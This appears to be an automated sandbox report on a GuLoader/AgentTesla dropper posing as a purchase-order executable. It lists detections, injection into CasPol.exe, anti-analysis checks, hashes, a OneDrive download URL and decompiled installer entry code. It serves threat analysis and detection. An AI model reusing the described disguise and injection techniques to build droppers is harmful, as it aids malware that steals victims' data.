      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Writes to foreign memory regionsShow sources
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1300000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\SPORENE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\SPORENE.exeJump to behavior
      Source: SPORENE.exe, 00000002.00000002.628178990.0000000002080000.00000002.00020000.sdmp, CasPol.exe, 0000000A.00000002.626654609.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: SPORENE.exe, 00000002.00000002.628178990.0000000002080000.00000002.00020000.sdmp, CasPol.exe, 0000000A.00000002.626654609.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: SPORENE.exe, 00000002.00000002.628178990.0000000002080000.00000002.00020000.sdmp, CasPol.exe, 0000000A.00000002.626654609.0000000001D10000.00000002.00020000.sdmpBinary or memory string: &Program Manager
      Source: SPORENE.exe, 00000002.00000002.628178990.0000000002080000.00000002.00020000.sdmp, CasPol.exe, 0000000A.00000002.626654609.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 531732 Sample: Purchase Order PO20211027STK.exe Startdate: 01/12/2021 Architecture: WINDOWS Score: 100 22 onedrive.live.com 2->22 24 ervtqq.bl.files.1drv.com 2->24 26 bl-files.fe.1drv.com 2->26 28 Found malware configuration 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 GuLoader behavior detected 2->32 34 6 other signatures 2->34 9 Purchase Order PO20211027STK.exe 9 2->9         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\SPORENE.exe, PE32 9->20 dropped 12 SPORENE.exe 9->12         started        process6 signatures7 36 Writes to foreign memory regions 12->36 38 Tries to detect Any.run 12->38 40 Hides threads from debuggers 12->40 15 CasPol.exe 1 12->15         started        process8 signatures9 42 Tries to detect Any.run 15->42 44 Hides threads from debuggers 15->44 18 conhost.exe 15->18         started        process10

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Purchase Order PO20211027STK.exe11%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      Purchase Order PO20211027STK.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\SPORENE.exe9%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      onedrive.live.com
      unknown
      unknownfalse
        high
        ervtqq.bl.files.1drv.com
        unknown
        unknownfalse
          high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://onedrive.live.com/download?cid=5A15FDA1AE98540B&rfalse
            high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nsis.sf.net/NSIS_ErrorErrorPurchase Order PO20211027STK.exefalse
              high

              Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:531732
              Start date:01.12.2021
              Start time:09:57:30
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 56s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:Purchase Order PO20211027STK.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@6/1@2/0
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 100% (good quality ratio 97.1%)
              • Quality average: 83.8%
              • Quality standard deviation: 24.5%
              HCA Information:Failed
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.43.12
              • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.dc-msedge.net, ctldl.windowsupdate.com, arc.msn.com, l-0004.dc-msedge.net, ris.api.iris.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, odc-bl-files-geo.onedrive.akadns.net
              • Not all processes where analyzed, report is missing behavior information

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\SPORENE.exe
              Process:C:\Users\user\Desktop\Purchase Order PO20211027STK.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):21321008
              Entropy (8bit):0.09325738133607682
              Encrypted:false
              SSDEEP:3072:mIXeoCC869BrI49jK9oUhJSSjfv8XEHPO:madlYoUZf2EvO
              MD5:582A642DF36CDAC38982E4842F370B44
              SHA1:3DD6D0CECD4CD9414D7DF148F7C46548C5709D62
              SHA-256:361DEDDF3E436753730DBB20842FBD6D1EF2EC27C56CD9DA99E87751C3BBE890
              SHA-512:E9C94417ACEF2B33DED79182C8B397E2693A74D290E78E286AE7576C998BF14F39F370C06BC40C9DFFDF2DE2E7F680AA0F33D74DB508E15EEAF1D31BE8D06BB6
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 9%
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.UM.ek.RM.RichSM.................PE..L.....5Y.....................0C.....$.............@..........................@E.....,qE.........................................(.... ....C.........P@E.....................................................0... ....................................text............................... ..`.data...p...........................@....rsrc.....C.. ... C.. ..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.060974988277113
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Purchase Order PO20211027STK.exe
              File size:131031
              MD5:2f2102ec5776497950e89e419515efee
              SHA1:1d3dd4ed88af22c3de29c918b37db6f0b73c94c4
              SHA256:7768da29cc4ef93cb4790f664e139d1d8c2972e22fe8840b6b86c50e15dba347
              SHA512:963b79cb63703ea6a6e8d70bbe76fadc660e10b801283a3812a76f773ee36210171437794dad0b4ee11e8a2f34645c88c7463526be03274ffdf48ec81823032a
              SSDEEP:3072:gbG7N2kDTHUpou4ubV4QviYqsYLQyI9xxsFIRO7c3fkA:gbE/HUjV4QviYJMQXyFIR2HA
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

              File Icon

              Icon Hash:b2a88c96b2ca6a72

              Static PE Info

              General

              Entrypoint:0x40352d
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

              Entrypoint Preview

              Instruction
              push ebp
              mov ebp, esp
              sub esp, 000003F4h
              push ebx
              push esi
              push edi
              push 00000020h
              pop edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [ebp-14h], ebx
              mov dword ptr [ebp-04h], 0040A2E0h
              mov dword ptr [ebp-10h], ebx
              call dword ptr [004080CCh]
              mov esi, dword ptr [004080D0h]
              lea eax, dword ptr [ebp-00000140h]
              push eax
              mov dword ptr [ebp-0000012Ch], ebx
              mov dword ptr [ebp-2Ch], ebx
              mov dword ptr [ebp-28h], ebx
              mov dword ptr [ebp-00000140h], 0000011Ch
              call esi
              test eax, eax
              jne 00007FEEC0975E6Ah
              lea eax, dword ptr [ebp-00000140h]
              mov dword ptr [ebp-00000140h], 00000114h
              push eax
              call esi
              mov ax, word ptr [ebp-0000012Ch]
              mov ecx, dword ptr [ebp-00000112h]
              sub ax, 00000053h
              add ecx, FFFFFFD0h
              neg ax
              sbb eax, eax
              mov byte ptr [ebp-26h], 00000004h
              not eax
              and eax, ecx
              mov word ptr [ebp-2Ch], ax
              cmp dword ptr [ebp-0000013Ch], 0Ah
              jnc 00007FEEC0975E3Ah
              and word ptr [ebp-00000132h], 0000h
              mov eax, dword ptr [ebp-00000134h]
              movzx ecx, byte ptr [ebp-00000138h]
              mov dword ptr [00434FB8h], eax
              xor eax, eax
              mov ah, byte ptr [ebp-0000013Ch]
              movzx eax, ax
              or eax, ecx
              xor ecx, ecx
              mov ch, byte ptr [ebp-2Ch]
              movzx ecx, cx
              shl eax, 10h
              or eax, ecx

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000x11e0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata0x360000x160000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x4c0000x11e00x1200False0.368489583333data4.48173978815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_BITMAP0x4c2680x368dataEnglishUnited States
              RT_ICON0x4c5d00x2e8dataEnglishUnited States
              RT_DIALOG0x4c8b80x144dataEnglishUnited States
              RT_DIALOG0x4ca000x13cdataEnglishUnited States
              RT_DIALOG0x4cb400x100dataEnglishUnited States
              RT_DIALOG0x4cc400x11cdataEnglishUnited States
              RT_DIALOG0x4cd600xc4dataEnglishUnited States
              RT_DIALOG0x4ce280x60dataEnglishUnited States
              RT_GROUP_ICON0x4ce880x14dataEnglishUnited States
              RT_MANIFEST0x4cea00x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Dec 1, 2021 10:00:47.501432896 CET5033953192.168.2.68.8.8.8
              Dec 1, 2021 10:00:48.096002102 CET6330753192.168.2.68.8.8.8

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Dec 1, 2021 10:00:47.501432896 CET192.168.2.68.8.8.80x9999Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
              Dec 1, 2021 10:00:48.096002102 CET192.168.2.68.8.8.80xbdeStandard query (0)ervtqq.bl.files.1drv.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Dec 1, 2021 10:00:47.535913944 CET8.8.8.8192.168.2.60x9999No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
              Dec 1, 2021 10:00:48.138751984 CET8.8.8.8192.168.2.60xbdeNo error (0)ervtqq.bl.files.1drv.combl-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
              Dec 1, 2021 10:00:48.138751984 CET8.8.8.8192.168.2.60xbdeNo error (0)bl-files.fe.1drv.comodc-bl-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:09:58:37
              Start date:01/12/2021
              Path:C:\Users\user\Desktop\Purchase Order PO20211027STK.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe"
              Imagebase:0x400000
              File size:131031 bytes
              MD5 hash:2F2102EC5776497950E89E419515EFEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Start time:09:58:40
              Start date:01/12/2021
              Path:C:\Users\user\AppData\Local\Temp\SPORENE.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\SPORENE.exe
              Imagebase:0x400000
              File size:21321008 bytes
              MD5 hash:582A642DF36CDAC38982E4842F370B44
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Antivirus matches:
              • Detection: 9%, ReversingLabs
              Reputation:low

              General

              Start time:09:59:47
              Start date:01/12/2021
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\SPORENE.exe
              Imagebase:0xea0000
              File size:107624 bytes
              MD5 hash:F866FC1C2E928779C7119353C3091F0C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.509732142.0000000001300000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, Author: Joe Security
              Reputation:moderate

              General

              Start time:09:59:49
              Start date:01/12/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >

                Executed Functions

                C-Code - Quality: 78%
                			_entry_() {
                				WCHAR* _v8;
                				signed int _v12;
                				void* _v16;
                				signed int _v20;
                				int _v24;
                				int _v28;
                				struct _TOKEN_PRIVILEGES _v40;
                				signed char _v42;
                				int _v44;
                				signed int _v48;
                				intOrPtr _v278;
                				signed short _v310;
                				struct _OSVERSIONINFOW _v324;
                				struct _SHFILEINFOW _v1016;
                				intOrPtr* _t88;
                				WCHAR* _t92;
                				char* _t94;
                				void _t97;
                				void* _t116;
                				WCHAR* _t118;
                				signed int _t119;
                				intOrPtr* _t123;
                				void* _t137;
                				void* _t143;
                				void* _t148;
                				void* _t152;
                				void* _t157;
                				signed int _t167;
                				void* _t170;
                				void* _t175;
                				intOrPtr _t177;
                				intOrPtr _t178;
                				intOrPtr* _t179;
                				int _t188;
                				void* _t189;
                				void* _t198;
                				signed int _t204;
                				signed int _t209;
                				signed int _t214;
                				signed int _t216;
                				int* _t218;
                				signed int _t226;
                				signed int _t229;
                				CHAR* _t231;
                				char* _t232;
                				signed int _t233;
                				WCHAR* _t234;
                				void* _t250;
                
                				_t216 = 0x20;
                				_t188 = 0;
                				_v24 = 0;
                				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                				_v20 = 0;
                				SetErrorMode(0x8001); // executed
                				_v324.szCSDVersion = 0;
                				_v48 = 0;
                				_v44 = 0;
                				_v324.dwOSVersionInfoSize = 0x11c;
                				if(GetVersionExW( &_v324) == 0) {
                					_v324.dwOSVersionInfoSize = 0x114;
                					GetVersionExW( &_v324);
                					asm("sbb eax, eax");
                					_v42 = 4;
                					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                				}
                				if(_v324.dwMajorVersion < 0xa) {
                					_v310 = _v310 & 0x00000000;
                				}
                				 *0x434fb8 = _v324.dwBuildNumber;
                				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                				if( *0x434fbe != 0x600) {
                					_t179 = E0040690A(_t188);
                					if(_t179 != _t188) {
                						 *_t179(0xc00);
                					}
                				}
                				_t231 = "UXTHEME";
                				do {
                					E0040689A(_t231); // executed
                					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                				} while ( *_t231 != 0);
                				E0040690A(0xb);
                				 *0x434f04 = E0040690A(9);
                				_t88 = E0040690A(7);
                				if(_t88 != _t188) {
                					_t88 =  *_t88(0x1e);
                					if(_t88 != 0) {
                						 *0x434fbc =  *0x434fbc | 0x00000080;
                					}
                				}
                				__imp__#17();
                				__imp__OleInitialize(_t188); // executed
                				 *0x434fc0 = _t88;
                				SHGetFileInfoW(0x42b228, _t188,  &_v1016, 0x2b4, _t188); // executed
                				E0040653D(0x433f00, L"NSIS Error");
                				_t92 = GetCommandLineW();
                				_t232 = L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ";
                				E0040653D(_t232, _t92);
                				_t94 = _t232;
                				_t233 = 0x22;
                				 *0x434f00 = 0x400000;
                				_t250 = L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" " - _t233; // 0x22
                				if(_t250 == 0) {
                					_t216 = _t233;
                					_t94 =  &M00440002;
                				}
                				_t198 = CharNextW(E00405E39(_t94, _t216));
                				_v16 = _t198;
                				while(1) {
                					_t97 =  *_t198;
                					_t251 = _t97 - _t188;
                					if(_t97 == _t188) {
                						break;
                					}
                					_t209 = 0x20;
                					__eflags = _t97 - _t209;
                					if(_t97 != _t209) {
                						L17:
                						__eflags =  *_t198 - _t233;
                						_v12 = _t209;
                						if( *_t198 == _t233) {
                							_v12 = _t233;
                							_t198 = _t198 + 2;
                							__eflags = _t198;
                						}
                						__eflags =  *_t198 - 0x2f;
                						if( *_t198 != 0x2f) {
                							L32:
                							_t198 = E00405E39(_t198, _v12);
                							__eflags =  *_t198 - _t233;
                							if(__eflags == 0) {
                								_t198 = _t198 + 2;
                								__eflags = _t198;
                							}
                							continue;
                						} else {
                							_t198 = _t198 + 2;
                							__eflags =  *_t198 - 0x53;
                							if( *_t198 != 0x53) {
                								L24:
                								asm("cdq");
                								asm("cdq");
                								_t214 = L"NCRC" & 0x0000ffff;
                								asm("cdq");
                								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
                								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
                								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
                									L29:
                									asm("cdq");
                									asm("cdq");
                									_t209 = L" /D=" & 0x0000ffff;
                									asm("cdq");
                									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
                									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
                									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
                										L31:
                										_t233 = 0x22;
                										goto L32;
                									}
                									__eflags =  *_t198 - _t229;
                									if( *_t198 == _t229) {
                										 *(_t198 - 4) = _t188;
                										__eflags = _t198;
                										E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t198);
                										L37:
                										_t234 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                										GetTempPathW(0x400, _t234);
                										_t116 = E004034FC(_t198, _t251);
                										_t252 = _t116;
                										if(_t116 != 0) {
                											L40:
                											DeleteFileW(L"1033"); // executed
                											_t118 = E0040307D(_t254, _v20); // executed
                											_v8 = _t118;
                											if(_t118 != _t188) {
                												L68:
                												ExitProcess(); // executed
                												__imp__OleUninitialize(); // executed
                												if(_v8 == _t188) {
                													if( *0x434f94 == _t188) {
                														L77:
                														_t119 =  *0x434fac;
                														if(_t119 != 0xffffffff) {
                															_v24 = _t119;
                														}
                														ExitProcess(_v24);
                													}
                													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                														_v40.PrivilegeCount = 1;
                														_v28 = 2;
                														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                													}
                													_t123 = E0040690A(4);
                													if(_t123 == _t188) {
                														L75:
                														if(ExitWindowsEx(2, 0x80040002) != 0) {
                															goto L77;
                														}
                														goto L76;
                													} else {
                														_push(0x80040002);
                														_push(0x25);
                														_push(_t188);
                														_push(_t188);
                														_push(_t188);
                														if( *_t123() == 0) {
                															L76:
                															E0040140B(9);
                															goto L77;
                														}
                														goto L75;
                													}
                												}
                												E00405B9D(_v8, 0x200010);
                												ExitProcess(2);
                											}
                											if( *0x434f1c == _t188) {
                												L51:
                												 *0x434fac =  *0x434fac | 0xffffffff;
                												_v24 = E00403BEC(_t264);
                												goto L68;
                											}
